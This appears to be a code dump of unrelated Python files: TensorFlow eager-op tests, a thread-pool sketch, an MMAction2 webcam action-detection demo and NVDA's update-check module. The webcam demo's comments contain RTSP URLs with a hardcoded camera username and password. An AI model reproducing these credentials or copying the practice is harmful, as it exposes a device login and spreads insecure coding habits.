attrs=('T', dtypes.float32.as_datatype_enum, 'squeeze_dims',
['0', '2']))
@test_util.disable_eager_op_as_function('b/206994108')
def testExecuteListTypeListShapeAttr(self):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', [dtypes.float64.as_datatype_enum], 'shapes',
[[1, 2]], 'capacity', -1, 'container', '', 'shared_name', ''))
def testExecuteListTypeAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', dtypes.float64.as_datatype_enum, 'shapes',
[[1, 2]], 'capacity', -1, 'container', '', 'shared_name', ''))
def testExecuteListTypeAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', '1', 'shapes', [[1, 2]], 'capacity', -1,
'container', '', 'shared_name', ''))
def testExecuteListShapeAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', [dtypes.float64.as_datatype_enum], 'shapes',
[1, 2], 'capacity', -1, 'container', '', 'shared_name', ''))
def testExecuteListShapeAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', [dtypes.float64.as_datatype_enum], 'shapes',
[1], 'capacity', -1, 'container', '', 'shared_name', ''))
def testExecuteMultipleOutputs(self):
split_dim = 1
value = [[0, 1, 2], [3, 4, 5]]
x1, x2, x3 = execute(
b'Split',
num_outputs=3,
inputs=[constant_op.constant(split_dim),
constant_op.constant(value)],
attrs=('num_split', 3, 'T', dtypes.int32.as_datatype_enum))
self.assertAllEqual([[0], [3]], x1)
self.assertAllEqual([[1], [4]], x2)
self.assertAllEqual([[2], [5]], x3)
def testExecuteBadNumOutputsArgument(self):
with self.assertRaises(TypeError):
execute(
b'Relu', [],
inputs=[constant_op.constant(3.0)],
attrs=('T', dtypes.float32.as_datatype_enum))
@test_util.disable_tfrt('TFRT raises InternalError instead of NotFoundError')
def testExecuteUnknownOp(self):
with self.assertRaises(errors.NotFoundError):
execute(b'BlahBlahBlah', num_outputs=1, inputs=[], attrs=None)
def testExecuteUnknownAttr(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Identity',
num_outputs=1,
inputs=[constant_op.constant(3)],
attrs=('T', dtypes.int32.as_datatype_enum, 'unknown_attr', 'blah'))
def testComposition(self):
def add(x, y):
return execute(
b'Add',
num_outputs=1,
inputs=[x, y],
attrs=('T', dtypes.int32.as_datatype_enum))[0]
x = constant_op.constant(1)
three_x = add(add(x, x), x)
self.assertEqual(dtypes.int32, three_x.dtype)
self.assertAllEqual(3, three_x)
@test_util.run_gpu_only
def testOperationWithNoInputsRunsOnDevice(self):
shape = constant_op.constant([], dtype=dtypes.int32)
# x: Run the "TruncatedNormal" op CPU and copy result to GPU.
x = truncated_normal(shape).gpu()
# y: Explicitly run the "TruncatedNormal" op on GPU.
with context.device('gpu:0'):
y = truncated_normal(shape)
# Add would fail if x and y were not on the same device.
execute(
b'Add', 1, inputs=[x, y], attrs=('T', x.dtype.as_datatype_enum))
def testInvalidDevice(self):
with self.assertRaises(ValueError):
with context.device('pu:0'):
_ = constant_op.constant(1)
def testConvertMixedEagerTensors(self):
array = np.zeros((), dtype=np.float32)
tensor = constant_op.constant(0., dtype=dtypes.float32)
types, tensors = execute_lib.convert_to_mixed_eager_tensors(
[array, tensor], context.context())
for typ, t in zip(types, tensors):
self.assertEqual(typ, dtypes.float32)
self.assertIsInstance(t, ops.EagerTensor)
def testConvertMixedEagerTensorsWithVariables(self):
var = resource_variable_ops.ResourceVariable(1.0)
types, tensors = execute_lib.convert_to_mixed_eager_tensors(
['foo', var], context.context())
self.assertAllEqual([dtypes.string, dtypes.float32], types)
for t in tensors:
self.assertIsInstance(t, ops.EagerTensor)
# TODO(b/123637108): re-enable
@test_util.run_gpu_only
def disabled_testSmallIntegerOpsForcedToCPU(self):
a = constant_op.constant((1, 2, 3, 4, 5), dtype=dtypes.int64)
b = constant_op.constant((2, 3, 4, 5, 6), dtype=dtypes.int64)
with context.device('gpu:0'):
c = a + b
# Op forced to CPU since all constants are integers and small.
self.assertEndsWith(c.device, 'CPU:0')
a = array_ops.zeros((8, 10), dtype=dtypes.int64)
b = array_ops.ones((8, 10), dtype=dtypes.int64)
with context.device('gpu:0'):
c = a + b
# Op not forced to CPU since the tensors are larger than 64 elements.
self.assertEndsWith(c.device, 'GPU:0')
a = constant_op.constant((1, 2, 3, 4, 5), dtype=dtypes.float32)
b = constant_op.constant((2, 3, 4, 5, 6), dtype=dtypes.float32)
with context.device('gpu:0'):
c = a + b
# Op not forced to CPU since the constants are not integers.
self.assertEndsWith(c.device, 'GPU:0')
def testExecutionModeIsStoredThreadLocal(self):
cv = threading.Condition()
count = [0]
num_threads = 10
def execution_mode_test(cond, count, num_threads, ctx, mode):
cond.acquire()
# Ensure that all threads set their mode simultaneously
# Note that this is not a simple assignment, as the execution_mode is an
# @property with a custom setter.
ctx.execution_mode = mode
count[0] = count[0] + 1
if count[0] < num_threads:
cond.wait()
else:
cond.notify_all()
cond.release()
self.assertEqual(ctx.execution_mode, mode)
ctx = context.Context()
threads = []
for i in range(num_threads):
t = threading.Thread(
target=execution_mode_test,
args=(cv, count, num_threads, ctx,
context.SYNC if i % 2 == 0 else context.ASYNC))
t.start()
threads.append(t)
for t in threads:
t.join()
def testEmptyResourceReturned(self):
with ops.device('CPU:0'):
v = variables.Variable(1.)
empty_handle = array_ops.gather(
v.handle[array_ops.newaxis], array_ops.zeros([0], dtype=dtypes.int32))
self.assertEqual(
[0],
empty_handle.shape.as_list())
@test_util.with_eager_op_as_function
class SendRecvTest(test_util.TensorFlowTestCase):
cpu_device = '/job:localhost/replica:0/task:0/device:CPU:0'
def _send(self, tensor, tensor_name, to_device):
return execute(
b'_Send', num_outputs=0, inputs=[tensor],
attrs=('T', tensor.dtype.as_datatype_enum,
'tensor_name', tensor_name,
'send_device', tensor.device,
'send_device_incarnation', 0,
'recv_device', to_device,
'client_terminated', True))
def _recv(self, dtype, tensor_name, from_device):
device_name = context.context().device_name
if not device_name:
device_name = self.cpu_device
return execute(
b'_Recv', num_outputs=1, inputs=[],
attrs=('tensor_type', dtype.as_datatype_enum,
'tensor_name', tensor_name,
'send_device', from_device,
'send_device_incarnation', 0,
'recv_device', device_name,
'client_terminated', False))[0]
def setUp(self):
super(SendRecvTest, self).setUp()
context._reset_context()
configure_virtual_cpus()
@test_util.disable_tfrt('Send/Receive not supported in TFRT yet.')
def testBasic(self):
with ops.device(self.cpu_device):
t0 = constant_op.constant(1.0)
t1 = constant_op.constant(2.0)
self._send(t0, 't0', self.cpu_device)
self._send(t1, 't1', self.cpu_device)
self.assertAllEqual(
self._recv(dtypes.float32, 't0', self.cpu_device),
1.0)
self.assertAllEqual(
self._recv(dtypes.float32, 't1', self.cpu_device),
2.0)
@test_util.run_gpu_only
@test_util.disable_tfrt('Send/Receive not supported in TFRT yet.')
def testLocalCrossDevice(self):
gpu_device_name = '/job:localhost/replica:0/task:0/device:GPU:0'
with ops.device('GPU:0'):
t0 = array_ops.identity(1.0)
self._send(t0, 't0', self.cpu_device)
with ops.device('cpu:0'):
self.assertAllEqual(
self._recv(dtypes.float32, 't0', gpu_device_name),
1.0)
self._send(constant_op.constant(2.0), 't1', gpu_device_name)
with ops.device('GPU:0'):
self.assertAllEqual(
self._recv(dtypes.float32, 't1', self.cpu_device),
2.0)
class EagerTensorCacheTest(test_util.TensorFlowTestCase):
def setUp(self):
super(EagerTensorCacheTest, self).setUp()
context._reset_context()
configure_virtual_cpus()
def testCacheSkipsTensorsTooLarge(self):
cache = context._EagerTensorCache(max_items=100, max_tensor_size=3)
cache.put('1', array_ops.zeros((2, 2)))
self.assertIsNone(cache.get('1'))
cache.put('2', array_ops.zeros((2)))
self.assertIsNotNone(cache.get('2'))
if __name__ == '__main__':
test.main()
|
tkew.py | from threading import Thread
from multiprocessing import cpu_count
from typing import List, Tuple, Optional
import time
DEFAULT_WORKER_SIZE = max(1, cpu_count() // 2)  # never default to zero workers on a single-core box
class TaskQueue:
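"""A minimal thread-pool sketch: a delegator thread hands queued
(fn, args, kwargs) tuples to the first idle worker slot.

Hypothetical usage:
tq = TaskQueue(num_workers=2)
tq.start()
tq.queue(print, "hello from a worker")
tq.stop()
"""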
def __init__(self, num_workers: int = DEFAULT_WORKER_SIZE):
self.__workers: List[Thread] = [Thread(target=self.__listen, args=(wid,) ) for wid in range(num_workers)]
self.__delegator: Thread = Thread(target=self.__delegate)
self.__q: List[Tuple] = []
self.__jobs: List[Optional[Tuple]] = [None] * num_workers
self.__signal: bool = False
def __listen(self, wid):
while not self.__signal:
job = self.__jobs[wid]
if job is not None:
fn, ags, kwa = job
fn(*ags, **kwa)
self.__jobs[wid] = None
else:
time.sleep(0.001)  # yield while idle instead of busy-spinning a core
def __poll(self) -> int:
# Round-robin scan for the first worker slot with no pending job.
i = 0
n = len(self.__workers)
while self.__jobs[i % n] is not None:
i += 1
return i % n
def __delegate(self):
while not self.__signal:
if len(self.__q) != 0:
wid = self.__poll()
self.__jobs[wid] = self.__q.pop(0)
else:
time.sleep(0.001)  # nothing queued; yield
def start(self):
self.__delegator.start()
for worker in self.__workers:
worker.start()
def stop(self):
# Block until the queue drains and every worker slot is idle, then signal shutdown.
while any(job is not None for job in self.__jobs) or len(self.__q) != 0:
time.sleep(0.001)
self.__signal = True
self.__delegator.join()
for worker in self.__workers:
worker.join()
def queue(self, fn, *args, **kwargs):
self.__q.append((fn, args, kwargs)) |
webcam_demo_via3.py | import argparse
import time
from collections import deque
from operator import itemgetter
from threading import Thread
import mmcv
import cv2
import numpy as np
import torch
from mmcv.parallel import collate, scatter
from mmcv.runner import load_checkpoint
from mmaction.datasets.registry import DATASETS
from mmcv.utils import build_from_cfg
from mmaction.apis import init_recognizer
from mmaction.datasets.pipelines import Compose
from mmaction.utils import import_module_error_func
from mmaction.models import build_detector
import random
import seaborn as sns
from mmaction.datasets.via3_dataset import VIA3Dataset
try:
from mmdet.apis import inference_detector, init_detector, show_result_pyplot
except (ImportError, ModuleNotFoundError):
@import_module_error_func('mmdet')
def inference_detector(*args, **kwargs):
pass
@import_module_error_func('mmdet')
def init_detector(*args, **kwargs):
pass
FONTFACE = cv2.FONT_HERSHEY_COMPLEX_SMALL
FONTSCALE = 1
FONTCOLOR = (255, 255, 255) # BGR, white
MSGCOLOR = (128, 128, 128) # BGR, gray
THICKNESS = 1
LINETYPE = 1
EXCLUED_STEPS = [
'OpenCVInit', 'OpenCVDecode', 'DecordInit', 'DecordDecode', 'PyAVInit',
'PyAVDecode', 'RawFrameDecode', 'FrameSelector'
]
def parse_args():
parser = argparse.ArgumentParser(description='MMAction2 webcam demo')
parser.add_argument(
'--config',
default=('configs/detection/ava/'
'slowfast_kinetics_pretrained_r50_8x8x1_20e_ava_rgb.py'),
help='spatio temporal detection config file path')
parser.add_argument(
'--checkpoint',
default=('../../Checkpoints/mmdetection/faster_rcnn_r50_fpn_2x_coco_bbox_mAP-0.384_20200504_210434-a5d8aa15'),
help='spatio temporal detection checkpoint file/url')
parser.add_argument(
'--det-config',
default='../../Checkpoints/mmdetection/my_gfl_r50_fpn_mstrain_2x_person_gn.py',
help='human detection config file path (from mmdet)')
parser.add_argument(
'--det-checkpoint',
default=('../../Checkpoints/mmdetection/my_gfl_r50_fpn_mstrain_2x_person_gn.pth'),
help='human detection checkpoint file/url')
parser.add_argument(
'--device', type=str, default='cuda:0', help='CPU/CUDA device option')
parser.add_argument(
'--camera-id', type=int, default=0, help='camera device id')
parser.add_argument(
'--img-scale', type=float, default=0.25, help='output image resize scale')
parser.add_argument(
'--det-score-thr',
type=float,
default=0.5,
help='the threshold of human detection score')
parser.add_argument(
'--act-score-thr',
type=float,
default=0.5,
help='the threshold of human action score')
parser.add_argument(
'--drawing-stepsize',
type=int,
default=3,
help='render one output drawing per n captured frames')
args = parser.parse_args()
assert args.drawing_stepsize >= 1, \
'drawing-stepsize must be a positive integer: the frame-skip test ' \
'uses it as a modulus, so zero would raise ZeroDivisionError'
return args
def load_label_map(data_cfg):
data_test_cfg = data_cfg.test
dataset_cfg=None
if data_test_cfg.type=='ConcatDataset':
dataset_cfg = data_test_cfg.datasets[0]
elif data_test_cfg.type=='VIA3Dataset':
dataset_cfg = data_test_cfg
else:
print('Only ConcatDataset or VIA3Dataset are supported at the moment')
via3 = build_from_cfg(dataset_cfg, DATASETS)
return via3.opt_labels2opt_names
class DetModel:
def __init__(self, config, checkpoint, score_thr=0.5, device='cuda:0'):
self.score_thr = score_thr
self.device = device
self.model = init_detector(config, checkpoint ,self.device)
assert self.model.CLASSES[0] == 'person', ('We require you to use a detector '
'trained on COCO')
def __call__(self, imgs):
result = inference_detector(self.model , imgs)
bboxes, labels = restore_result(result)
thr_ind = bboxes[:,4]>=self.score_thr
bboxes, labels = bboxes[thr_ind], labels[thr_ind]
class_ind = labels==0
bboxes, labels = bboxes[class_ind], labels[class_ind]
return bboxes, labels
class ActModel():
def __init__(self, config_path, checkpoint, score_thr=0.5, label_dict=None, device='cuda:0'):
self.score_thr = score_thr
self.label_dict =label_dict
self.device = device
config = mmcv.Config.fromfile(config_path)
self.img_norm_cfg = config['img_norm_cfg']
if 'to_rgb' not in self.img_norm_cfg and 'to_bgr' in self.img_norm_cfg:
to_bgr = self.img_norm_cfg.pop('to_bgr')
self.img_norm_cfg['to_rgb'] = to_bgr
self.img_norm_cfg['mean'] = np.array(self.img_norm_cfg['mean'])
self.img_norm_cfg['std'] = np.array(self.img_norm_cfg['std'])
# Get clip_len, frame_interval and calculate center index of each clip
val_pipeline = config['val_pipeline']
sampler = [x for x in val_pipeline if x['type'] == 'SampleVia3Frames'][0]
self.clip_len, self.frame_interval = sampler['clip_len'], sampler['frame_interval']
self.window_size = self.clip_len * self.frame_interval
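# window_size is the temporal span, in raw frames, covered by one sampled clip.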
assert self.clip_len % 2 == 0, 'We would like to have an even clip_len'
config.model.backbone.pretrained = None
self.model = build_detector(config.model, test_cfg=config.get('test_cfg'))
load_checkpoint(self.model, checkpoint, map_location=self.device)
self.model.to(self.device)
self.model.eval()
def post_process(self, result, proposal):
result = result[0]
act_pred = []
# N proposals
for i in range(proposal.shape[0]):
act_pred.append([])
# Perform action score thr
for i in range(len(result)):
if (i not in self.label_dict) or (i==0):
continue
for j in range(proposal.shape[0]):
if result[i][j, 4] > self.score_thr:
act_pred[j].append((self.label_dict[i], result[i][j, 4]))
return act_pred
def __call__(self, frames, proposals):
frame_w, frame_h = frames[0].shape[1], frames[0].shape[0]
new_w, new_h = mmcv.rescale_size((frame_w, frame_h), (256, np.Inf))
w_ratio, h_ratio = new_w / frame_w, new_h / frame_h
frames = [mmcv.imresize(img, (new_w, new_h)) for img in frames]
_ = [mmcv.imnormalize_(frame, **self.img_norm_cfg) for frame in frames]
# THWC -> CTHW -> 1CTHW
input_array = np.stack(frames).transpose((3, 0, 1, 2))[np.newaxis]
input_tensor = torch.from_numpy(input_array).to(self.device)
proposal = proposals[len(proposals) // 2]
proposal = torch.from_numpy(proposal[:, :4]).to(self.device)
if proposal.shape[0] == 0:
return None
proposal[:, 0:4:2] *= w_ratio
proposal[:, 1:4:2] *= h_ratio
with torch.no_grad():
result = self.model(
return_loss=False,
img=[input_tensor],
img_metas=[[dict(img_shape=(new_h, new_w))]],
proposals=[[proposal]])
return self.post_process(result, proposal)
def random_color(seed):
"""Random a color according to the input seed."""
random.seed(seed)
colors = sns.color_palette()
color = random.choice(colors)
return color
def visualize_bbox_act(img, bboxes,labels, act_preds,
classes=None,thickness=1,
font_scale=0.4,show=False,
wait_time=0,out_file=None):
"""Show the tracks with opencv."""
assert bboxes.ndim == 2
assert labels.ndim == 1
assert bboxes.shape[0] == labels.shape[0]
assert bboxes.shape[1] == 5
if isinstance(img, str):
img = mmcv.imread(img)
img_shape = img.shape
bboxes[:, 0::2] = np.clip(bboxes[:, 0::2], 0, img_shape[1])
bboxes[:, 1::2] = np.clip(bboxes[:, 1::2], 0, img_shape[0])
text_width, text_height = 8, 15
for i, (bbox, label) in enumerate(zip(bboxes, labels), 0):
x1, y1, x2, y2 = bbox[:4].astype(np.int32)
score = float(bbox[-1])
# bbox
bbox_color = random_color(label)
bbox_color = [int(255 * _c) for _c in bbox_color][::-1]
cv2.rectangle(img, (x1, y1), (x2, y2), bbox_color, thickness=thickness)
# score
text = '{:.02f}'.format(score)
width = len(text) * text_width
img[y1 - text_height:y1, x1:x1 + width, :] = bbox_color
cv2.putText(
img,
text, (x1, y1 - 2),
cv2.FONT_HERSHEY_COMPLEX,
font_scale,
color=(0, 0, 0))
classes_color = random_color(label + 1)
text = classes[label]
width = len(text) * text_width
img[y1:y1 + text_height, x1:x1 + width, :] = bbox_color
cv2.putText(img,text,
(x1, y1 + text_height - 2),
cv2.FONT_HERSHEY_COMPLEX,
font_scale,color=classes_color)
#background_color = random_color(label + 5)
background_color = [255, 204, 153]
if (act_preds is not None) and (len(bboxes)==len(labels)==len(act_preds)):
for j, act_pred in enumerate(act_preds[i]):
text = '{}: {:.02f}'.format(act_pred[0], act_pred[1])
width = len(text) * (text_width)
img[y1+text_height*(j+2) :y1 + text_height*(j+3), x1:x1 + width, :] = background_color
cv2.putText(img, text,
(x1, y1 + text_height*(j+3) - 2),
cv2.FONT_HERSHEY_COMPLEX,
font_scale, color=classes_color)
if show:
mmcv.imshow(img, wait_time=wait_time)
if out_file is not None:
mmcv.imwrite(img, out_file)
return img
def restore_result(result, return_ids=False):
"""Restore the results (list of results of each category) into the results
of the model forward.
Args:
result (list[ndarray]): shape (n, 5) or (n, 6)
return_ids (bool, optional): Whether the input has tracking
result. Default to False.
Returns:
tuple: tracking results of each class.
"""
labels = []
for i, bbox in enumerate(result):
labels.extend([i] * bbox.shape[0])
bboxes = np.concatenate(result, axis=0).astype(np.float32)
labels = np.array(labels, dtype=np.int64)
if return_ids:
ids = bboxes[:, 0].astype(np.int64)
bboxes = bboxes[:, 1:]
return bboxes, labels, ids
else:
return bboxes, labels
def det_inference(args):
global start_frame_ind, frame_queue_length
total_frame_id = 0
activate_frame_id = 0
is_already_act_show = True
act_fid = None
act_preds =None
border_length = act_model.window_size//2
while True:
ret, frame = camera.read()
total_frame_id += 1
if (not ret) or (total_frame_id%args.drawing_stepsize!=0) :
continue
activate_frame_id +=1
shape = (int(frame.shape[1] * args.img_scale), int(frame.shape[0] * args.img_scale))
img = cv2.resize(frame, shape)
bboxes, labels = det_model(img)
frame_queue.append([activate_frame_id,np.array(img),bboxes, labels])
show_frame_id, old_frame, bboxes, labels= frame_queue[0]
if is_already_act_show and len(result_queue)!=0:
act_fid, new_preds = result_queue.popleft()
is_already_act_show = False
visualize_bbox_act(old_frame, bboxes, labels, act_preds,
classes =['person'],show=True,wait_time=1)
if (act_fid is not None):
print(start_frame_ind, show_frame_id - act_fid, len(result_queue))
if abs(show_frame_id - act_fid) > border_length:
start_frame_ind += (show_frame_id - act_fid)//5
start_frame_ind = max(min(start_frame_ind, frame_queue_length-border_length), border_length)
#print(frame_queue_length-border_length, start_frame_ind, border_length)
if (show_frame_id >= act_fid) :
act_preds = new_preds
is_already_act_show = True
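# det_inference (producer) fills frame_queue with per-frame person detections,
# while act_inference (consumer) samples a clip_len x frame_interval window
# around start_frame_ind and pushes action predictions onto result_queue.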
def act_inference(args):
while len(frame_queue) == 0:
time.sleep(0.2)
while True:
frame_inds = start_frame_ind + np.arange(0, act_model.window_size, act_model.frame_interval)
if (len(result_queue) <=3) and (len(frame_queue) > frame_inds[-1]):
cur_windows_fids, cur_windows_imgs, = [], []
cur_windows_dets, cur_windows_labels = [], []
for ind in frame_inds:
cur_windows_fids.append(frame_queue[ind][0])
act_img = frame_queue[ind][1].astype(np.float32)
cur_windows_imgs.append(act_img)
det = frame_queue[ind][2].astype(np.float32)
cur_windows_dets.append(det)
cur_windows_labels.append(frame_queue[ind][3])
fid = cur_windows_fids[len(cur_windows_fids) // 2]
act_pred = act_model(cur_windows_imgs, cur_windows_dets)
print(act_pred)
result_queue.append([fid, act_pred])
else:
time.sleep(0.005)
def main():
global frame_queue, frame_queue_length, result_queue
global det_model
global act_model, window_size, start_frame_ind
global camera, camera_fps, frame_w, frame_h
args = parse_args()
camera = cv2.VideoCapture(args.camera_id)
#camera = cv2.VideoCapture('rtsp://admin:XFchipeak@192.168.1.48:554')
#camera = cv2.VideoCapture('demo/ava_demo.mp4')
camera_fps = camera.get(cv2.CAP_PROP_FPS) # frame rate
det_model = DetModel(args.det_config, args.det_checkpoint, score_thr=0.5, device=args.device)
config = mmcv.Config.fromfile(args.config)
labels2names_dict = load_label_map(config.data)
act_model = ActModel(args.config, args.checkpoint, score_thr=0.5, label_dict=labels2names_dict, device=args.device)
start_frame_ind = act_model.window_size
frame_queue_length = act_model.window_size*3
assert act_model.window_size > 0
try:
frame_queue = deque(maxlen=frame_queue_length)
result_queue = deque(maxlen=5)
pw = Thread(target=det_inference, args=(args, ), daemon=True)
pr = Thread(target=act_inference, args=(args, ), daemon=True)
pw.start()
pr.start()
pw.join()
pr.join()
except KeyboardInterrupt:
pass
if __name__ == '__main__':
main()
# rtsp://admin:XFchipeak@192.168.1.64:554
# mywork/seq2.avi
|
updateCheck.py | #updateCheck.py
#A part of NonVisual Desktop Access (NVDA)
#This file is covered by the GNU General Public License.
#See the file COPYING for more details.
#Copyright (C) 2012-2018 NV Access Limited, Zahari Yurukov, Babbage B.V.
"""Update checking functionality.
@note: This module may raise C{RuntimeError} on import if update checking for this build is not supported.
"""
import globalVars
import config
if globalVars.appArgs.secure:
raise RuntimeError("updates disabled in secure mode")
elif config.isAppX:
raise RuntimeError("updates managed by Windows Store")
import versionInfo
if not versionInfo.updateVersionType:
raise RuntimeError("No update version type, update checking not supported")
import winVersion
import os
import threading
import time
import cPickle
import urllib
import tempfile
import hashlib
import ctypes.wintypes
import ssl
import wx
import languageHandler
import gui
from gui import guiHelper
from logHandler import log
import config
import shellapi
import winUser
#: The URL to use for update checks.
CHECK_URL = "https://www.nvaccess.org/nvdaUpdateCheck"
#: The time to wait between checks.
CHECK_INTERVAL = 86400 # 1 day
#: The time to wait before retrying a failed check.
RETRY_INTERVAL = 600 # 10 min
#: The download block size in bytes.
DOWNLOAD_BLOCK_SIZE = 8192 # 8 KiB
#: directory to store pending update files
storeUpdatesDir=os.path.join(globalVars.appArgs.configPath, 'updates')
try:
os.makedirs(storeUpdatesDir)
except OSError:
if not os.path.isdir(storeUpdatesDir):
log.debugWarning("Default download path for updates %s could not be created."%storeUpdatesDir)
#: Persistent state information.
#: @type: dict
state = None
_stateFileName = None
#: The single instance of L{AutoUpdateChecker} if automatic update checking is enabled,
#: C{None} if it is disabled.
autoChecker = None
def checkForUpdate(auto=False):
"""Check for an updated version of NVDA.
This will block, so it generally shouldn't be called from the main thread.
@param auto: Whether this is an automatic check for updates.
@type auto: bool
@return: Information about the update or C{None} if there is no update.
@rtype: dict
@raise RuntimeError: If there is an error checking for an update.
"""
params = {
"autoCheck": auto,
"version": versionInfo.version,
"versionType": versionInfo.updateVersionType,
"osVersion": winVersion.winVersionText,
"x64": os.environ.get("PROCESSOR_ARCHITEW6432") == "AMD64",
"language": languageHandler.getLanguage(),
"installed": config.isInstalledCopy(),
}
url = "%s?%s" % (CHECK_URL, urllib.urlencode(params))
try:
res = urllib.urlopen(url)
except IOError as e:
if isinstance(e.strerror, ssl.SSLError) and e.strerror.reason == "CERTIFICATE_VERIFY_FAILED":
# #4803: Windows fetches trusted root certificates on demand.
# Python doesn't trigger this fetch (PythonIssue:20916), so try it ourselves
_updateWindowsRootCertificates()
# and then retry the update check.
res = urllib.urlopen(url)
else:
raise
if res.code != 200:
raise RuntimeError("Checking for update failed with code %d" % res.code)
info = {}
for line in res:
line = line.rstrip()
try:
key, val = line.split(": ", 1)
except ValueError:
raise RuntimeError("Error in update check output")
info[key] = val
if not info:
return None
return info
def getPendingUpdate():
"""Returns the path to the pending update, if any. Returns C{None} otherwise.
@rtype: str
"""
try:
pendingUpdateFile=state["pendingUpdateFile"]
except KeyError:
state["pendingUpdateFile"] = state["pendingUpdateVersion"] = None
return None
else:
if pendingUpdateFile and os.path.isfile(pendingUpdateFile):
return pendingUpdateFile
else:
state["pendingUpdateFile"] = None
return None
def isPendingUpdate():
"""Returns whether there is a pending update.
@rtype: bool
"""
return bool(getPendingUpdate())
def executeUpdate(destPath=None):
if not destPath:
destPath=getPendingUpdate()
if not destPath:
return
state["pendingUpdateFile"]=None
state["pendingUpdateVersion"]=None
saveState()
if config.isInstalledCopy():
executeParams = u"--install -m"
else:
portablePath = os.getcwdu()
if os.access(portablePath, os.W_OK):
executeParams = u'--create-portable --portable-path "{portablePath}" --config-path "{configPath}" -m'.format(
portablePath=portablePath,
configPath=os.path.abspath(globalVars.appArgs.configPath)
)
else:
executeParams = u"--launcher"
# #4475: ensure that the new process shows its first window, by providing SW_SHOWNORMAL
shellapi.ShellExecute(None, None,
destPath.decode("mbcs"),
executeParams,
None, winUser.SW_SHOWNORMAL)
class UpdateChecker(object):
"""Check for an updated version of NVDA, presenting appropriate user interface.
The check is performed in the background.
This class is for manual update checks.
To use, call L{check} on an instance.
"""
AUTO = False
def check(self):
"""Check for an update.
"""
t = threading.Thread(target=self._bg)
t.daemon = True
self._started()
t.start()
def _bg(self):
try:
info = checkForUpdate(self.AUTO)
except:
log.debugWarning("Error checking for update", exc_info=True)
self._error()
return
self._result(info)
if info:
state["dontRemindVersion"] = info["version"]
state["lastCheck"] = time.time()
saveState()
if autoChecker:
autoChecker.setNextCheck()
def _started(self):
self._progressDialog = gui.IndeterminateProgressDialog(gui.mainFrame,
# Translators: The title of the dialog displayed while manually checking for an NVDA update.
_("Checking for Update"),
# Translators: The progress message displayed while manually checking for an NVDA update.
_("Checking for update"))
def _error(self):
wx.CallAfter(self._progressDialog.done)
self._progressDialog = None
wx.CallAfter(gui.messageBox,
# Translators: A message indicating that an error occurred while checking for an update to NVDA.
_("Error checking for update."),
# Translators: The title of an error message dialog.
_("Error"),
wx.OK | wx.ICON_ERROR)
def _result(self, info):
wx.CallAfter(self._progressDialog.done)
self._progressDialog = None
wx.CallAfter(UpdateResultDialog, gui.mainFrame, info, False)
class AutoUpdateChecker(UpdateChecker):
"""Automatically check for an updated version of NVDA.
To use, create a single instance and maintain a reference to it.
Checks will then be performed automatically.
"""
AUTO = True
def __init__(self):
self._checkTimer = wx.PyTimer(self.check)
if config.conf["update"]["startupNotification"] and isPendingUpdate():
secsTillNext = 0 # Display the update message instantly
else:
# Set the initial check based on the last check time.
# #3260: If the system time is earlier than the last check,
# treat the last check as being right now (so the next will be tomorrow).
secsSinceLast = max(time.time() - state["lastCheck"], 0)
# The maximum time till the next check is CHECK_INTERVAL.
secsTillNext = CHECK_INTERVAL - int(min(secsSinceLast, CHECK_INTERVAL))
self._checkTimer.Start(secsTillNext * 1000, True)
def terminate(self):
self._checkTimer.Stop()
self._checkTimer = None
def setNextCheck(self, isRetry=False):
# #6127: Timers must be manipulated from the main thread.
wx.CallAfter(self._checkTimer.Stop)
wx.CallAfter(self._checkTimer.Start, (RETRY_INTERVAL if isRetry else CHECK_INTERVAL) * 1000, True)
def _started(self):
log.info("Performing automatic update check")
def _error(self):
self.setNextCheck(isRetry=True)
def _result(self, info):
if not info:
return
if info["version"]==state["dontRemindVersion"]:
return
wx.CallAfter(UpdateResultDialog, gui.mainFrame, info, True)
class UpdateResultDialog(wx.Dialog):
def __init__(self, parent, updateInfo, auto):
# Translators: The title of the dialog informing the user about an NVDA update.
super(UpdateResultDialog, self).__init__(parent, title=_("NVDA Update"))
self.updateInfo = updateInfo
mainSizer = wx.BoxSizer(wx.VERTICAL)
sHelper = guiHelper.BoxSizerHelper(self, orientation=wx.VERTICAL)
if updateInfo:
self.isInstalled = config.isInstalledCopy()
if isPendingUpdate() and state["pendingUpdateVersion"] == updateInfo["version"]:
# Translators: A message indicating that an updated version of NVDA has been downloaded
# and is pending to be installed.
message = _("NVDA version {version} has been downloaded and is pending installation.").format(**updateInfo)
else:
# Translators: A message indicating that an updated version of NVDA is available.
# {version} will be replaced with the version; e.g. 2011.3.
message = _("NVDA version {version} is available.").format(**updateInfo)
else:
# Translators: A message indicating that no update to NVDA is available.
message = _("No update available.")
sHelper.addItem(wx.StaticText(self, label=message))
bHelper = sHelper.addDialogDismissButtons(guiHelper.ButtonHelper(wx.HORIZONTAL))
if updateInfo:
if isPendingUpdate() and state["pendingUpdateVersion"] == updateInfo["version"]:
# Translators: The label of a button to install a pending NVDA update.
# {version} will be replaced with the version; e.g. 2011.3.
installPendingButton = bHelper.addButton(self, label=_("&Install NVDA {version}").format(**updateInfo))
installPendingButton.Bind(wx.EVT_BUTTON, self.onInstallButton)
# Translators: The label of a button to re-download a pending NVDA update.
label = _("Re-&download update")
else:
# Translators: The label of a button to download an NVDA update.
label = _("&Download update")
downloadButton = bHelper.addButton(self, label=label)
downloadButton.Bind(wx.EVT_BUTTON, self.onDownloadButton)
if auto and (not isPendingUpdate() or state["pendingUpdateVersion"] != updateInfo["version"]):
# Translators: The label of a button to remind the user later about performing some action.
remindMeButton = bHelper.addButton(self, label=_("Remind me &later"))
remindMeButton.Bind(wx.EVT_BUTTON, self.onLaterButton)
remindMeButton.SetFocus()
# Translators: The label of a button to close a dialog.
closeButton = bHelper.addButton(self, wx.ID_CLOSE, label=_("&Close"))
closeButton.Bind(wx.EVT_BUTTON, lambda evt: self.Close())
self.Bind(wx.EVT_CLOSE, lambda evt: self.Destroy())
self.EscapeId = wx.ID_CLOSE
